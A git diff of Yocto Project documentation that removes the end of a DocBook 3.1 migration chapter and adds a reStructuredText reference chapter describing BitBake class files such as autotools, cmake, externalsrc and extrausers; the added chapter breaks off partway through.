-                <listitem><para>linux-firmware now has a new package for <filename>bcm4366c</filename> and includes available NVRAM config files into the <filename>bcm43340</filename>, <filename>bcm43362</filename>, <filename>bcm43430</filename> and <filename>bcm4356-pcie</filename> packages.</para></listitem>
-                <listitem><para><filename>harfbuzz</filename> now splits the new <filename>libharfbuzz-subset.so</filename> library into its own package to reduce the main package size in cases where <filename>libharfbuzz-subset.so</filename> is not needed.</para></listitem>
-            </itemizedlist>
-        </para>
-    </section>
-    
-    <section id='migration-3.1-package-qa-warnings'>
-        <title>Additional warnings</title>
-
-        <para>
-            Warnings will now be shown at <filename>do_package_qa</filename> time in the following circumstances:
-            
-            <itemizedlist>
-                <listitem><para>A recipe installs <filename>.desktop</filename> files containing <filename>MimeType</filename> keys but does not inherit the new <filename>mime-xdg</filename> class</para></listitem>
-                <listitem><para>A recipe installs <filename>.xml</filename> files into <filename>${datadir}/mime/packages</filename> but does not inherit the <filename>mime</filename> class</para></listitem>
-            </itemizedlist>
-        </para>
-    </section>
-        
-    <section id='migration-3.1-x86-live-wic'>
-        <title><filename>wic</filename> image type now used instead of <filename>live</filename> by default for x86</title>
-
-        <para>
-            <filename>conf/machine/include/x86-base.inc</filename> (inherited by most x86 machine configurations) now specifies <filename>wic</filename> instead of <filename>live</filename> by default in <link linkend='var-IMAGE_FSTYPES'><filename>IMAGE_FSTYPES</filename></link>. The <filename>live</filename> image type will likely be removed in a future release so it is recommended that you use <filename>wic</filename> instead.
-        </para>
-    </section>
-                
-    <section id='migration-3.1-misc'>
-        <title>Miscellaneous changes</title>
-
-        <para>
-            <itemizedlist>
-                <listitem><para>The undocumented <filename>SRC_DISTRIBUTE_LICENSES</filename> variable has now been removed in favour of a new <filename>AVAILABLE_LICENSES</filename> variable which is dynamically set based upon license files found in <filename>${COMMON_LICENSE_DIR}</filename> and <filename>${LICENSE_PATH}</filename>.</para></listitem>
-                <listitem><para>The tune definition for big-endian microblaze machines is now <filename>microblaze</filename> instead of <filename>microblazeeb</filename>.</para></listitem>
-                <listitem><para><filename>newlib</filename> no longer has built-in syscalls. <filename>libgloss</filename> should then provide the syscalls, <filename>crt0.o</filename> and other functions that are no longer part of <filename>newlib</filename> itself. If you are using <filename>TCLIBC = "newlib"</filename> this now means that you must link applications with both <filename>newlib</filename> and <filename>libgloss</filename>, whereas before <filename>newlib</filename> would run in many configurations by itself.</para></listitem>
-            </itemizedlist>
-        </para>
-    </section>
-
-</section>
-
-
-</chapter>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/ref-manual/ref-classes.rst b/documentation/ref-manual/ref-classes.rst
new file mode 100644
index 0000000000..dea27eea88
--- /dev/null
+++ b/documentation/ref-manual/ref-classes.rst
@@ -0,0 +1,2899 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+*******
+Classes
+*******
+
+Class files are used to abstract common functionality and share it
+amongst multiple recipe (``.bb``) files. To use a class file, you simply
+make sure the recipe inherits the class. In most cases, when a recipe
+inherits a class it is enough to enable its features. There are cases,
+however, where in the recipe you might need to set variables or override
+some default behavior.
+
+Any :term:`Metadata` usually found in a recipe can also be
+placed in a class file. Class files are identified by the extension
+``.bbclass`` and are usually placed in a ``classes/`` directory beneath
+the ``meta*/`` directory found in the :term:`Source Directory`.
+Class files can also be pointed to by
+:term:`BUILDDIR` (e.g. ``build/``) in the same way as
+``.conf`` files in the ``conf`` directory. Class files are searched for
+in :term:`BBPATH` using the same method by which ``.conf``
+files are searched.
+
+This chapter discusses only the most useful and important classes. Other
+classes do exist within the ``meta/classes`` directory in the Source
+Directory. You can reference the ``.bbclass`` files directly for more
+information.
+
+.. _ref-classes-allarch:
+
+``allarch.bbclass``
+===================
+
+The ``allarch`` class is inherited by recipes that do not produce
+architecture-specific output. The class disables functionality that is
+normally needed for recipes that produce executable binaries (such as
+building the cross-compiler and a C library as pre-requisites, and
+splitting out of debug symbols during packaging).
+
+.. note::
+
+   Unlike some distro recipes (e.g. Debian), OpenEmbedded recipes that
+   produce packages that depend on tunings through use of the
+   :term:`RDEPENDS` and
+   :term:`TUNE_PKGARCH` variables, should never be
+   configured for all architectures using ``allarch``. This is the case
+   even if the recipes do not produce architecture-specific output.
+
+   Configuring such recipes for all architectures causes the
+   ``do_package_write_*`` tasks to
+   have different signatures for the machines with different tunings.
+   Additionally, unnecessary rebuilds occur every time an image for a
+   different ``MACHINE`` is built even when the recipe never changes.
+
+By default, all recipes inherit the :ref:`base <ref-classes-base>` and
+:ref:`package <ref-classes-package>` classes, which enable
+functionality needed for recipes that produce executable output. If your
+recipe, for example, only produces packages that contain configuration
+files, media files, or scripts (e.g. Python and Perl), then it should
+inherit the ``allarch`` class.
+
+.. _ref-classes-archiver:
+
+``archiver.bbclass``
+====================
+
+The ``archiver`` class supports releasing source code and other
+materials with the binaries.
+
+For more details on the source archiver, see the
+":ref:`dev-manual/dev-manual-common-tasks:maintaining open source license compliance during your product's lifecycle`"
+section in the Yocto Project Development Tasks Manual. You can also see
+the :term:`ARCHIVER_MODE` variable for information
+about the variable flags (varflags) that help control archive creation.
+
+.. _ref-classes-autotools:
+
+``autotools*.bbclass``
+======================
+
+The ``autotools*`` classes support Autotooled packages.
+
+The ``autoconf``, ``automake``, and ``libtool`` packages bring
+standardization. This class defines a set of tasks (e.g. ``configure``,
+``compile`` and so forth) that work for all Autotooled packages. It
+should usually be enough to define a few standard variables and then
+simply ``inherit autotools``. These classes can also work with software
+that emulates Autotools. For more information, see the
+":ref:`new-recipe-autotooled-package`" section
+in the Yocto Project Development Tasks Manual.
+
+By default, the ``autotools*`` classes use out-of-tree builds (i.e.
+``autotools.bbclass`` building with ``B != S``).
+
+If the software being built by a recipe does not support using
+out-of-tree builds, you should have the recipe inherit the
+``autotools-brokensep`` class. The ``autotools-brokensep`` class behaves
+the same as the ``autotools`` class but builds with :term:`B`
+== :term:`S`. This method is useful when out-of-tree build
+support is either not present or is broken.
+
+.. note::
+
+   It is recommended that out-of-tree support be fixed and used if at
+   all possible.
+
+It's useful to have some idea of how the tasks defined by the
+``autotools*`` classes work and what they do behind the scenes.
+
+-  :ref:`ref-tasks-configure` - Regenerates the
+   configure script (using ``autoreconf``) and then launches it with a
+   standard set of arguments used during cross-compilation. You can pass
+   additional parameters to ``configure`` through the ``EXTRA_OECONF``
+   or :term:`PACKAGECONFIG_CONFARGS`
+   variables.
+
+-  :ref:`ref-tasks-compile` - Runs ``make`` with
+   arguments that specify the compiler and linker. You can pass
+   additional arguments through the ``EXTRA_OEMAKE`` variable.
+
+-  :ref:`ref-tasks-install` - Runs ``make install`` and
+   passes in ``${``\ :term:`D`\ ``}`` as ``DESTDIR``.
+
+.. _ref-classes-base:
+
+``base.bbclass``
+================
+
+The ``base`` class is special in that every ``.bb`` file implicitly
+inherits the class. This class contains definitions for standard basic
+tasks such as fetching, unpacking, configuring (empty by default),
+compiling (runs any ``Makefile`` present), installing (empty by default)
+and packaging (empty by default). These classes are often overridden or
+extended by other classes such as the
+:ref:`autotools <ref-classes-autotools>` class or the
+:ref:`package <ref-classes-package>` class.
+
+The class also contains some commonly used functions such as
+``oe_runmake``, which runs ``make`` with the arguments specified in
+:term:`EXTRA_OEMAKE` variable as well as the
+arguments passed directly to ``oe_runmake``.
+
+.. _ref-classes-bash-completion:
+
+``bash-completion.bbclass``
+===========================
+
+Sets up packaging and dependencies appropriate for recipes that build
+software that includes bash-completion data.
+
+.. _ref-classes-bin-package:
+
+``bin_package.bbclass``
+=======================
+
+The ``bin_package`` class is a helper class for recipes that extract the
+contents of a binary package (e.g. an RPM) and install those contents
+rather than building the binary from source. The binary package is
+extracted and new packages in the configured output package format are
+created. Extraction and installation of proprietary binaries is a good
+example use for this class.
+
+.. note::
+
+   For RPMs and other packages that do not contain a subdirectory, you
+   should specify an appropriate fetcher parameter to point to the
+   subdirectory. For example, if BitBake is using the Git fetcher (``git://``),
+   the "subpath" parameter limits the checkout to a specific subpath
+   of the tree. Here is an example where ``${BP}`` is used so that the files
+   are extracted into the subdirectory expected by the default value of
+   ``S``:
+   ::
+
+           SRC_URI = "git://example.com/downloads/somepackage.rpm;subpath=${BP}"
+
+
+   See the ":ref:`bitbake-user-manual/bitbake-user-manual-fetching:fetchers`" section in the BitBake User Manual for
+   more information on supported BitBake Fetchers.
+
+.. _ref-classes-binconfig:
+
+``binconfig.bbclass``
+=====================
+
+The ``binconfig`` class helps to correct paths in shell scripts.
+
+Before ``pkg-config`` had become widespread, libraries shipped shell
+scripts to give information about the libraries and include paths needed
+to build software (usually named ``LIBNAME-config``). This class assists
+any recipe using such scripts.
+
+During staging, the OpenEmbedded build system installs such scripts into
+the ``sysroots/`` directory. Inheriting this class results in all paths
+in these scripts being changed to point into the ``sysroots/`` directory
+so that all builds that use the script use the correct directories for
+the cross compiling layout. See the
+:term:`BINCONFIG_GLOB` variable for more
+information.
+
+.. _ref-classes-binconfig-disabled:
+
+``binconfig-disabled.bbclass``
+==============================
+
+An alternative version of the :ref:`binconfig <ref-classes-binconfig>`
+class, which disables binary configuration scripts by making them return
+an error in favor of using ``pkg-config`` to query the information. The
+scripts to be disabled should be specified using the
+:term:`BINCONFIG` variable within the recipe inheriting
+the class.
+
+.. _ref-classes-blacklist:
+
+``blacklist.bbclass``
+=====================
+
+The ``blacklist`` class prevents the OpenEmbedded build system from
+building specific recipes (blacklists them). To use this class, inherit
+the class globally and set :term:`PNBLACKLIST` for
+each recipe you wish to blacklist. Specify the :term:`PN`
+value as a variable flag (varflag) and provide a reason, which is
+reported, if the package is requested to be built as the value. For
+example, if you want to blacklist a recipe called "exoticware", you add
+the following to your ``local.conf`` or distribution configuration:
+::
+
+   INHERIT += "blacklist"
+   PNBLACKLIST[exoticware] = "Not supported by our organization."
+
+.. _ref-classes-buildhistory:
+
+``buildhistory.bbclass``
+========================
+
+The ``buildhistory`` class records a history of build output metadata,
+which can be used to detect possible regressions as well as used for
+analysis of the build output. For more information on using Build
+History, see the
+":ref:`dev-manual/dev-manual-common-tasks:maintaining build output quality`"
+section in the Yocto Project Development Tasks Manual.
+
+.. _ref-classes-buildstats:
+
+``buildstats.bbclass``
+======================
+
+The ``buildstats`` class records performance statistics about each task
+executed during the build (e.g. elapsed time, CPU usage, and I/O usage).
+
+When you use this class, the output goes into the
+:term:`BUILDSTATS_BASE` directory, which defaults
+to ``${TMPDIR}/buildstats/``. You can analyze the elapsed time using
+``scripts/pybootchartgui/pybootchartgui.py``, which produces a cascading
+chart of the entire build process and can be useful for highlighting
+bottlenecks.
+
+Collecting build statistics is enabled by default through the
+:term:`USER_CLASSES` variable from your
+``local.conf`` file. Consequently, you do not have to do anything to
+enable the class. However, if you want to disable the class, simply
+remove "buildstats" from the ``USER_CLASSES`` list.
+
+.. _ref-classes-buildstats-summary:
+
+``buildstats-summary.bbclass``
+==============================
+
+When inherited globally, prints statistics at the end of the build on
+sstate re-use. In order to function, this class requires the
+:ref:`buildstats <ref-classes-buildstats>` class be enabled.
+
+.. _ref-classes-ccache:
+
+``ccache.bbclass``
+==================
+
+The ``ccache`` class enables the C/C++ Compiler Cache for the build.
+This class is used to give a minor performance boost during the build.
+However, using the class can lead to unexpected side-effects. Thus, it
+is recommended that you do not use this class. See
+http://ccache.samba.org/ for information on the C/C++ Compiler
+Cache.
+
+.. _ref-classes-chrpath:
+
+``chrpath.bbclass``
+===================
+
+The ``chrpath`` class is a wrapper around the "chrpath" utility, which
+is used during the build process for ``nativesdk``, ``cross``, and
+``cross-canadian`` recipes to change ``RPATH`` records within binaries
+in order to make them relocatable.
+
+.. _ref-classes-clutter:
+
+``clutter.bbclass``
+===================
+
+The ``clutter`` class consolidates the major and minor version naming
+and other common items used by Clutter and related recipes.
+
+.. note::
+
+   Unlike some other classes related to specific libraries, recipes
+   building other software that uses Clutter do not need to inherit this
+   class unless they use the same recipe versioning scheme that the
+   Clutter and related recipes do.
+
+.. _ref-classes-cmake:
+
+``cmake.bbclass``
+=================
+
+The ``cmake`` class allows for recipes that need to build software using
+the `CMake <https://cmake.org/overview/>`__ build system. You can use
+the :term:`EXTRA_OECMAKE` variable to specify
+additional configuration options to be passed using the ``cmake``
+command line.
+
+On the occasion that you would be installing custom CMake toolchain
+files supplied by the application being built, you should install them
+to the preferred CMake Module directory: ``${D}${datadir}/cmake/``
+Modules during
+:ref:`ref-tasks-install`.
+
+.. _ref-classes-cml1:
+
+``cml1.bbclass``
+================
+
+The ``cml1`` class provides basic support for the Linux kernel style
+build configuration system.
+
+.. _ref-classes-compress_doc:
+
+``compress_doc.bbclass``
+========================
+
+Enables compression for man pages and info pages. This class is intended
+to be inherited globally. The default compression mechanism is gz (gzip)
+but you can select an alternative mechanism by setting the
+:term:`DOC_COMPRESS` variable.
+
+.. _ref-classes-copyleft_compliance:
+
+``copyleft_compliance.bbclass``
+===============================
+
+The ``copyleft_compliance`` class preserves source code for the purposes
+of license compliance. This class is an alternative to the ``archiver``
+class and is still used by some users even though it has been deprecated
+in favor of the :ref:`archiver <ref-classes-archiver>` class.
+
+.. _ref-classes-copyleft_filter:
+
+``copyleft_filter.bbclass``
+===========================
+
+A class used by the :ref:`archiver <ref-classes-archiver>` and
+:ref:`copyleft_compliance <ref-classes-copyleft_compliance>` classes
+for filtering licenses. The ``copyleft_filter`` class is an internal
+class and is not intended to be used directly.
+
+.. _ref-classes-core-image:
+
+``core-image.bbclass``
+======================
+
+The ``core-image`` class provides common definitions for the
+``core-image-*`` image recipes, such as support for additional
+:term:`IMAGE_FEATURES`.
+
+.. _ref-classes-cpan:
+
+``cpan*.bbclass``
+=================
+
+The ``cpan*`` classes support Perl modules.
+
+Recipes for Perl modules are simple. These recipes usually only need to
+point to the source's archive and then inherit the proper class file.
+Building is split into two methods depending on which method the module
+authors used.
+
+-  Modules that use old ``Makefile.PL``-based build system require
+   ``cpan.bbclass`` in their recipes.
+
+-  Modules that use ``Build.PL``-based build system require using
+   ``cpan_build.bbclass`` in their recipes.
+
+Both build methods inherit the ``cpan-base`` class for basic Perl
+support.
+
+.. _ref-classes-cross:
+
+``cross.bbclass``
+=================
+
+The ``cross`` class provides support for the recipes that build the
+cross-compilation tools.
+
+.. _ref-classes-cross-canadian:
+
+``cross-canadian.bbclass``
+==========================
+
+The ``cross-canadian`` class provides support for the recipes that build
+the Canadian Cross-compilation tools for SDKs. See the
+":ref:`overview-manual/overview-manual-concepts:cross-development toolchain generation`"
+section in the Yocto Project Overview and Concepts Manual for more
+discussion on these cross-compilation tools.
+
+.. _ref-classes-crosssdk:
+
+``crosssdk.bbclass``
+====================
+
+The ``crosssdk`` class provides support for the recipes that build the
+cross-compilation tools used for building SDKs. See the
+":ref:`overview-manual/overview-manual-concepts:cross-development toolchain generation`"
+section in the Yocto Project Overview and Concepts Manual for more
+discussion on these cross-compilation tools.
+
+.. _ref-classes-debian:
+
+``debian.bbclass``
+==================
+
+The ``debian`` class renames output packages so that they follow the
+Debian naming policy (i.e. ``glibc`` becomes ``libc6`` and
+``glibc-devel`` becomes ``libc6-dev``.) Renaming includes the library
+name and version as part of the package name.
+
+If a recipe creates packages for multiple libraries (shared object files
+of ``.so`` type), use the :term:`LEAD_SONAME`
+variable in the recipe to specify the library on which to apply the
+naming scheme.
+
+.. _ref-classes-deploy:
+
+``deploy.bbclass``
+==================
+
+The ``deploy`` class handles deploying files to the
+:term:`DEPLOY_DIR_IMAGE` directory. The main
+function of this class is to allow the deploy step to be accelerated by
+shared state. Recipes that inherit this class should define their own
+:ref:`ref-tasks-deploy` function to copy the files to be
+deployed to :term:`DEPLOYDIR`, and use ``addtask`` to
+add the task at the appropriate place, which is usually after
+:ref:`ref-tasks-compile` or
+:ref:`ref-tasks-install`. The class then takes care of
+staging the files from ``DEPLOYDIR`` to ``DEPLOY_DIR_IMAGE``.
+
+.. _ref-classes-devshell:
+
+``devshell.bbclass``
+====================
+
+The ``devshell`` class adds the ``do_devshell`` task. Distribution
+policy dictates whether to include this class. See the ":ref:`platdev-appdev-devshell`"
+section in the Yocto Project Development Tasks Manual for more
+information about using ``devshell``.
+
+.. _ref-classes-devupstream:
+
+``devupstream.bbclass``
+=======================
+
+The ``devupstream`` class uses
+:term:`BBCLASSEXTEND` to add a variant of the
+recipe that fetches from an alternative URI (e.g. Git) instead of a
+tarball. Following is an example:
+::
+
+   BBCLASSEXTEND = "devupstream:target"
+   SRC_URI_class-devupstream = "git://git.example.com/example"
+   SRCREV_class-devupstream = "abcd1234"
+
+Adding the above statements to your recipe creates a variant that has
+:term:`DEFAULT_PREFERENCE` set to "-1".
+Consequently, you need to select the variant of the recipe to use it.
+Any development-specific adjustments can be done by using the
+``class-devupstream`` override. Here is an example:
+::
+
+   DEPENDS_append_class-devupstream = " gperf-native"
+   do_configure_prepend_class-devupstream() {
+       touch ${S}/README
+   }
+
+The class
+currently only supports creating a development variant of the target
+recipe, not ``native`` or ``nativesdk`` variants.
+
+The ``BBCLASSEXTEND`` syntax (i.e. ``devupstream:target``) provides
+support for ``native`` and ``nativesdk`` variants. Consequently, this
+functionality can be added in a future release.
+
+Support for other version control systems such as Subversion is limited
+due to BitBake's automatic fetch dependencies (e.g.
+``subversion-native``).
+
+.. _ref-classes-distutils:
+
+``distutils*.bbclass``
+======================
+
+The ``distutils*`` classes support recipes for Python version 2.x
+extensions, which are simple. These recipes usually only need to point
+to the source's archive and then inherit the proper class. Building is
+split into two methods depending on which method the module authors
+used.
+
+-  Extensions that use an Autotools-based build system require Autotools
+   and the classes based on ``distutils`` in their recipes.
+
+-  Extensions that use build systems based on ``distutils`` require the
+   ``distutils`` class in their recipes.
+
+-  Extensions that use build systems based on ``setuptools`` require the
+   :ref:`setuptools <ref-classes-setuptools>` class in their recipes.
+
+The ``distutils-common-base`` class is required by some of the
+``distutils*`` classes to provide common Python2 support.
+
+.. _ref-classes-distutils3:
+
+``distutils3*.bbclass``
+=======================
+
+The ``distutils3*`` classes support recipes for Python version 3.x
+extensions, which are simple. These recipes usually only need to point
+to the source's archive and then inherit the proper class. Building is
+split into three methods depending on which method the module authors
+used.
+
+-  Extensions that use an Autotools-based build system require Autotools
+   and ``distutils``-based classes in their recipes.
+
+-  Extensions that use ``distutils``-based build systems require the
+   ``distutils`` class in their recipes.
+
+-  Extensions that use build systems based on ``setuptools3`` require
+   the :ref:`setuptools3 <ref-classes-setuptools>` class in their
+   recipes.
+
+The ``distutils3*`` classes either inherit their corresponding
+``distutils*`` class or replicate them using a Python3 version instead
+(e.g. ``distutils3-base`` inherits ``distutils-common-base``, which is
+the same as ``distutils-base`` but inherits ``python3native`` instead of
+``pythonnative``).
+
+.. _ref-classes-externalsrc:
+
+``externalsrc.bbclass``
+=======================
+
+The ``externalsrc`` class supports building software from source code
+that is external to the OpenEmbedded build system. Building software
+from an external source tree means that the build system's normal fetch,
+unpack, and patch process is not used.
+
+By default, the OpenEmbedded build system uses the :term:`S`
+and :term:`B` variables to locate unpacked recipe source code
+and to build it, respectively. When your recipe inherits the
+``externalsrc`` class, you use the
+:term:`EXTERNALSRC` and
+:term:`EXTERNALSRC_BUILD` variables to
+ultimately define ``S`` and ``B``.
+
+By default, this class expects the source code to support recipe builds
+that use the :term:`B` variable to point to the directory in
+which the OpenEmbedded build system places the generated objects built
+from the recipes. By default, the ``B`` directory is set to the
+following, which is separate from the source directory (``S``):
+::
+
+   ${WORKDIR}/${BPN}/{PV}/
+
+See these variables for more information:
+:term:`WORKDIR`, :term:`BPN`, and
+:term:`PV`,
+
+For more information on the ``externalsrc`` class, see the comments in
+``meta/classes/externalsrc.bbclass`` in the :term:`Source Directory`.
+For information on how to use the
+``externalsrc`` class, see the
+":ref:`dev-manual/dev-manual-common-tasks:building software from an external source`"
+section in the Yocto Project Development Tasks Manual.
+
+.. _ref-classes-extrausers:
+
+``extrausers.bbclass``
+======================
+
+The ``extrausers`` class allows additional user and group configuration
+to be applied at the image level. Inheriting this class either globally
+or from an image recipe allows additional user and group operations to
+be performed using the
+:term:`EXTRA_USERS_PARAMS` variable.
+
+.. note::
+
+   The user and group operations added using the
+   extrausers
+   class are not tied to a specific recipe outside of the recipe for the
+   image. Thus, the operations can be performed across the image as a
+   whole. Use the
+   useradd
+   class to add user and group configuration to a specific recipe.
+
+Here is an example that uses this class in an image recipe:
+::
+
+   inherit extrausers
+   EXTRA_USERS_PARAMS = "\
+       useradd -p '' tester; \
+       groupadd developers; \
+       userdel nobody; \
+       groupdel -g video; \
+       groupmod -g 1020 developers; \
+       usermod -s /bin/sh tester; \
+       "
+
+Here is an example that adds two users named "tester-jim" and "tester-sue" and assigns
+passwords:
+::
+
+   inherit extrausers
+   EXTRA_USERS_PARAMS = "\
+       useradd -P tester01 tester-jim; \
+       useradd -P tester01 tester-sue; \
+       "
+
+Finally, here is an example that sets the root password to "1876*18":
+::
+
+   inherit extrausers
+   EXTRA_USERS_PARAMS = "\
+       usermod -P 1876*18 root; \
+       "
+
+.. _ref-classes-features_check:
+
+``features_check.bbclass``
+=================================
+
+The ``features_check`` class allows individual recipes to check
+for required and conflicting
+:term:`DISTRO_FEATURES`, :term:`MACHINE_FEATURES` or :term:`COMBINED_FEATURES`.
+
+This class provides support for the following variables:
+
+- :term:`REQUIRED_DISTRO_FEATURES`
+- :term:`CONFLICT_DISTRO_FEATURES`
+- :term:`ANY_OF_DISTRO_FEATURES`
+- ``REQUIRED_MACHINE_FEATURES``
+- ``CONFLICT_MACHINE_FEATURES``
+- ``ANY_OF_MACHINE_FEATURES``
+- ``REQUIRED_COMBINED_FEATURES``
+- ``CONFLICT_COMBINED_FEATURES``
+- ``ANY_OF_COMBINED_FEATURES``
+
+If any conditions specified in the recipe using the above
+variables are not met, the recipe will be skipped, and if the
+build system attempts to build the recipe then an error will be
+triggered.
+
+.. _ref-classes-fontcache:
+
+``fontcache.bbclass``
+=====================
+
+The ``fontcache`` class generates the proper post-install and
+post-remove (postinst and postrm) scriptlets for font packages. These
+scriptlets call ``fc-cache`` (part of ``Fontconfig``) to add the fonts
+to the font information cache. Since the cache files are
+architecture-specific, ``fc-cache`` runs using QEMU if the postinst
+scriptlets need to be run on the build host during image creation.
+
+If the fonts being installed are in packages other than the main
+package, set :term:`FONT_PACKAGES` to specify the
+packages containing the fonts.
+
+.. _ref-classes-fs-uuid:
+
+``fs-uuid.bbclass``
+===================
+
+The ``fs-uuid`` class extracts UUID from
+``${``\ :term:`ROOTFS`\ ``}``, which must have been built
+by the time that this function gets called. The ``fs-uuid`` class only
+works on ``ext`` file systems and depends on ``tune2fs``.
+
+.. _ref-classes-gconf:
+
+``gconf.bbclass``
+=================
+
+The ``gconf`` class provides common functionality for recipes that need
+to install GConf schemas. The schemas will be put into a separate
+package (``${``\ :term:`PN`\ ``}-gconf``) that is created
+automatically when this class is inherited. This package uses the
+appropriate post-install and post-remove (postinst/postrm) scriptlets to
+register and unregister the schemas in the target image.
+
+.. _ref-classes-gettext:
+
+``gettext.bbclass``
+===================
+
+The ``gettext`` class provides support for building software that uses
+the GNU ``gettext`` internationalization and localization system. All
+recipes building software that use ``gettext`` should inherit this
+class.
+
+.. _ref-classes-gnomebase:
+
+``gnomebase.bbclass``
+=====================
+
+The ``gnomebase`` class is the base class for recipes that build
+software from the GNOME stack. This class sets
+:term:`SRC_URI` to download the source from the GNOME
+mirrors as well as extending :term:`FILES` with the typical
+GNOME installation paths.
+
+.. _ref-classes-gobject-introspection:
+
+``gobject-introspection.bbclass``
+=================================
+
+Provides support for recipes building software that supports GObject
+introspection. This functionality is only enabled if the
+"gobject-introspection-data" feature is in
+:term:`DISTRO_FEATURES` as well as
+"qemu-usermode" being in
+:term:`MACHINE_FEATURES`.
+
+.. note::
+
+   This functionality is backfilled by default and, if not applicable,
+   should be disabled through ``DISTRO_FEATURES_BACKFILL_CONSIDERED`` or
+   ``MACHINE_FEATURES_BACKFILL_CONSIDERED``, respectively.
+
+.. _ref-classes-grub-efi:
+
+``grub-efi.bbclass``
+====================
+
+The ``grub-efi`` class provides ``grub-efi``-specific functions for
+building bootable images.
+
+This class supports several variables:
+
+-  :term:`INITRD`: Indicates list of filesystem images to
+   concatenate and use as an initial RAM disk (initrd) (optional).
+
+-  :term:`ROOTFS`: Indicates a filesystem image to include
+   as the root filesystem (optional).
+
+-  :term:`GRUB_GFXSERIAL`: Set this to "1" to have
+   graphics and serial in the boot menu.
+
+-  :term:`LABELS`: A list of targets for the automatic
+   configuration.
+
+-  :term:`APPEND`: An override list of append strings for
+   each ``LABEL``.
+
+-  :term:`GRUB_OPTS`: Additional options to add to the
+   configuration (optional). Options are delimited using semi-colon
+   characters (``;``).
+
+-  :term:`GRUB_TIMEOUT`: Timeout before executing
+   the default ``LABEL`` (optional).
+
+.. _ref-classes-gsettings:
+
+``gsettings.bbclass``
+=====================
+
+The ``gsettings`` class provides common functionality for recipes that
+need to install GSettings (glib) schemas. The schemas are assumed to be
+part of the main package. Appropriate post-install and post-remove
+(postinst/postrm) scriptlets are added to register and unregister the
+schemas in the target image.
+
+.. _ref-classes-gtk-doc:
+
+``gtk-doc.bbclass``
+===================
+
+The ``gtk-doc`` class is a helper class to pull in the appropriate
+``gtk-doc`` dependencies and disable ``gtk-doc``.
+
+.. _ref-classes-gtk-icon-cache:
+
+``gtk-icon-cache.bbclass``
+==========================
+
+The ``gtk-icon-cache`` class generates the proper post-install and
+post-remove (postinst/postrm) scriptlets for packages that use GTK+ and
+install icons. These scriptlets call ``gtk-update-icon-cache`` to add
+the fonts to GTK+'s icon cache. Since the cache files are
+architecture-specific, ``gtk-update-icon-cache`` is run using QEMU if
+the postinst scriptlets need to be run on the build host during image
+creation.
+
+.. _ref-classes-gtk-immodules-cache:
+
+``gtk-immodules-cache.bbclass``
+===============================
+
+The ``gtk-immodules-cache`` class generates the proper post-install and
+post-remove (postinst/postrm) scriptlets for packages that install GTK+
+input method modules for virtual keyboards. These scriptlets call
+``gtk-update-icon-cache`` to add the input method modules to the cache.
+Since the cache files are architecture-specific,
+``gtk-update-icon-cache`` is run using QEMU if the postinst scriptlets
+need to be run on the build host during image creation.
+
+If the input method modules being installed are in packages other than
+the main package, set
+:term:`GTKIMMODULES_PACKAGES` to specify
+the packages containing the modules.
+
+.. _ref-classes-gzipnative:
+
+``gzipnative.bbclass``
+======================
+
+The ``gzipnative`` class enables the use of different native versions of
+``gzip`` and ``pigz`` rather than the versions of these tools from the
+build host.
+
+.. _ref-classes-icecc:
+
+``icecc.bbclass``
+=================
+
+The ``icecc`` class supports
+`Icecream <https://github.com/icecc/icecream>`__, which facilitates
+taking compile jobs and distributing them among remote machines.
+
+The class stages directories with symlinks from ``gcc`` and ``g++`` to
+``icecc``, for both native and cross compilers. Depending on each
+configure or compile, the OpenEmbedded build system adds the directories
+at the head of the ``PATH`` list and then sets the ``ICECC_CXX`` and
+``ICEC_CC`` variables, which are the paths to the ``g++`` and ``gcc``
+compilers, respectively.
+
+For the cross compiler, the class creates a ``tar.gz`` file that
+contains the Yocto Project toolchain and sets ``ICECC_VERSION``, which
+is the version of the cross-compiler used in the cross-development
+toolchain, accordingly.
+
+The class handles all three different compile stages (i.e native
+,cross-kernel and target) and creates the necessary environment
+``tar.gz`` file to be used by the remote machines. The class also
+supports SDK generation.
+
+If :term:`ICECC_PATH` is not set in your
+``local.conf`` file, then the class tries to locate the ``icecc`` binary
+using ``which``. If :term:`ICECC_ENV_EXEC` is set
+in your ``local.conf`` file, the variable should point to the
+``icecc-create-env`` script provided by the user. If you do not point to
+a user-provided script, the build system uses the default script
+provided by the recipe ``icecc-create-env-native.bb``.
+
+.. note::
+
+   This script is a modified version and not the one that comes with
+   icecc.
+
+If you do not want the Icecream distributed compile support to apply to
+specific recipes or classes, you can effectively "blacklist" them by
+listing the recipes and classes using the
+:term:`ICECC_USER_PACKAGE_BL` and
+:term:`ICECC_USER_CLASS_BL`, variables,
+respectively, in your ``local.conf`` file. Doing so causes the
+OpenEmbedded build system to handle these compilations locally.
+
+Additionally, you can list recipes using the
+:term:`ICECC_USER_PACKAGE_WL` variable in
+your ``local.conf`` file to force ``icecc`` to be enabled for recipes
+using an empty :term:`PARALLEL_MAKE` variable.
+
+Inheriting the ``icecc`` class changes all sstate signatures.
+Consequently, if a development team has a dedicated build system that
+populates :term:`SSTATE_MIRRORS` and they want to
+reuse sstate from ``SSTATE_MIRRORS``, then all developers and the build
+system need to either inherit the ``icecc`` class or nobody should.
+
+At the distribution level, you can inherit the ``icecc`` class to be
+sure that all builders start with the same sstate signatures. After
+inheriting the class, you can then disable the feature by setting the
+:term:`ICECC_DISABLED` variable to "1" as follows:
+::
+
+   INHERIT_DISTRO_append = " icecc"
+   ICECC_DISABLED ??= "1"
+
+This practice
+makes sure everyone is using the same signatures but also requires
+individuals that do want to use Icecream to enable the feature
+individually as follows in your ``local.conf`` file:
+::
+
+   ICECC_DISABLED = ""
+
+.. _ref-classes-image:
+
+``image.bbclass``
+=================
+
+The ``image`` class helps support creating images in different formats.
+First, the root filesystem is created from packages using one of the
+``rootfs*.bbclass`` files (depending on the package format used) and
+then one or more image files are created.
+
+-  The ``IMAGE_FSTYPES`` variable controls the types of images to
+   generate.
+
+-  The ``IMAGE_INSTALL`` variable controls the list of packages to
+   install into the image.
+
+For information on customizing images, see the
+":ref:`usingpoky-extend-customimage`" section
+in the Yocto Project Development Tasks Manual. For information on how
+images are created, see the
+":ref:`images-dev-environment`" section in the
+Yocto Project Overview and Concpets Manual.
+
+.. _ref-classes-image-buildinfo:
+
+``image-buildinfo.bbclass``
+===========================
+
+The ``image-buildinfo`` class writes information to the target
+filesystem on ``/etc/build``.
+
+.. _ref-classes-image_types:
+
+``image_types.bbclass``
+=======================
+
+The ``image_types`` class defines all of the standard image output types
+that you can enable through the
